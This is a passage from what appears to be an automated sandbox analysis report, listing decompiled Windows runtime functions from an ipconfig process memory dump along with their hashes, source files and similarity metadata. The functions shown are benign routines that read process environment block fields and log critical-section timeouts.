              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
              • Instruction ID: 2d62864c122b390af575e7fda21fe6e5f4f17b8e422bec86c8cfb79a065369ef
              • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
              • Instruction Fuzzy Hash: C1C08C330C0288BBC7126A45CD00F02BB2AEB90B60F004020B6040AA618932E860D988
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EB7D50 Relevance: .0, Instructions: 7COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02EB7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




              0x02eb7d56
              0x02eb7d5b
              0x02eb7d60
              0x02eb7d5d
              0x02eb7d5d
              0x02eb7d5d

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
              • Instruction ID: 41204f3ce454cbd42f00be58c38bd4e5134c268797d559306f3f5ff4ba596a48
              • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
              • Instruction Fuzzy Hash: F6B092353519408FCF16DF18C080B5673E4BB86A84F8440D4E400CBA20D329E8008900
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC2ACB Relevance: .0, Instructions: 5COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E02EC2ACB() {
				void* _t5;

				return E02EAEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




              0x02ec2adc

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
              • Instruction ID: e9edc993b43020d0f8cf2625ea37110651ee242ebe2afc961ceeccf92e2f0818
              • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
              • Instruction Fuzzy Hash: F6B01232C52440CFCF12EF40C630B197372FB00750F0984A0A0012B930C228BC01CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F2FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
              Download Yara Rule
              C-Code - Quality: 53%
              			E02F2FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02EDCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02F25720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02F25720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










              0x02f2fdda
              0x02f2fde2
              0x02f2fde5
              0x02f2fdec
              0x02f2fdfa
              0x02f2fdff
              0x02f2fe0a
              0x02f2fe0f
              0x02f2fe17
              0x02f2fe1e
              0x02f2fe19
              0x02f2fe19
              0x02f2fe19
              0x02f2fe20
              0x02f2fe21
              0x02f2fe22
              0x02f2fe25
              0x02f2fe40

              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F2FDFA
              Strings
              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02F2FE2B
              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02F2FE01
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
              • API String ID: 885266447-3903918235
              • Opcode ID: acb805a86ecff9599c56ac3e58fd0634e1bb1e1265db8002859f6da20bfe7071
              • Instruction ID: 4a7a51773c76d8a6afc86f6c7d5bfe8c58171ff4980006f329869ce3bde19245
              • Opcode Fuzzy Hash: acb805a86ecff9599c56ac3e58fd0634e1bb1e1265db8002859f6da20bfe7071
              • Instruction Fuzzy Hash: EBF02232680600BBE6242A55CC02E33BB6AEB41770F244304FB2C865D0DA62A82086A0
              Uniqueness

              Uniqueness Score: -1.00%